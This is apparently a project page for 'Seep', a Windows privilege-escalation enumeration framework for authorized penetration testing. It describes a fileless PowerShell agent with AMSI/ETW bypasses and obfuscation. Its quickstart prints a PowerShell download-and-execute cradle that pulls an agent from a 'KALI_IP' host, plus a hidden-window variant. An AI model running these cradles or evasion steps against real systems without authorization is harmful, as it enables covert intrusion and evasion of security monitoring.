SEEP ENUMERATION FRAMEWORK PYTHON 3.9+
REPO SECURITY MIT
Real-Fruit-Snacks  //  Windows privesc enumeration  //  16 checks

SEEP.

checks
16 modules
tools
97 catalog
agent
Fileless · AES-256
mapping
ATT&CK MITRE
01 Premise

Windows privilege escalation enumeration framework with comprehensive discovery.

Deploy a fileless PowerShell agent that executes 16 modular checks across system configuration, user privileges, services, patches, and registry analysis. Framework orchestrates enumeration through a Python CLI with 97 tools across 7 categories.

Agent runs entirely in memory with AMSI/ETW bypasses, AES-256 encrypted uploads, and zero disk footprint. Generate single-file HTML reports with MITRE ATT&CK mappings and actionable exploitation guidance.

02 Specs

What's in the framework.

CHECKS
16 module categories — system info, privileges, network, patches, quick wins, registry secrets.
TOOLS
97-tool catalog across 7 categories with SHA256 verification and self-hosted distribution.
AGENT
Fileless PowerShell execution with AMSI/ETW bypass, obfuscation, stealth options.
CRYPTO
AES-256-CBC encryption with GZip compression for result uploads.
REPORTS
Single-file HTML with dark theme, no CDN dependencies, executive summaries.
STACK
Python CLI orchestration · PowerShell agent · JSON/ZIP uploads · offline analysis.
03 Quickstart

Initialize, serve, execute.

Framework deployment: Python CLI → agent composition → encrypted result upload with MITRE ATT&CK analysis.

# Install framework (Python 3.9+ required)
$ pipx install git+https://github.com/Real-Fruit-Snacks/Seep.git

# Initialize workspace and serve agent delivery
$ seep init --workdir /tmp/op1
$ seep serve --workdir /tmp/op1

# Execute fileless agent on target (server provides token)
$ powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://KALI_IP/agent.ps1?token=TOKEN')"

# Generate single-file HTML report with ATT&CK mapping
$ seep report /tmp/op1/results/results_*.json --format html --output report.html
04 Framework

Three-layer architecture.

Python CLI orchestrates agent composition and tool serving. PowerShell agent executes modular checks with OPSEC protections. Results encrypted and uploaded for offline analysis with MITRE ATT&CK mapping.

server/
cli.py              # Click CLI dispatch
agent/checks/       # 16 PowerShell modules
catalog/tools.yaml  # 97 tool definitions
http/serve.py       # Agent delivery + uploads
report/generator.py # HTML/Markdown/JSON
05 Operations

Agent composition and deployment.

Compose custom agents with cherry-picked checks. Apply obfuscation with CSPRNG identifier randomization. Deploy via IEX cradle with token authentication and encrypted uploads.

COMPOSE
seep compose --checks system_info,privileges
OBFUSCATE
seep compose --obfuscate --output agent.ps1
STEALTH
powershell -NoP -W Hidden -c "IEX(...)"
CATALOG
seep catalog download --all --verify
06 Authorization

Authorized Windows security testing only.

Framework designed for explicit written permission engagements. Generates significant PowerShell activity logged by Windows Event Log and monitoring solutions.

Report vulnerabilities via private security advisories, never public issues. Framework includes no exploitation capability and does not maintain persistent access.

Tool generates 16 enumeration checks with 97-tool catalog — analysis only, no system modification or credential harvesting.

→ START HERE

Windows privilege escalation
enumeration made systematic.

Open repo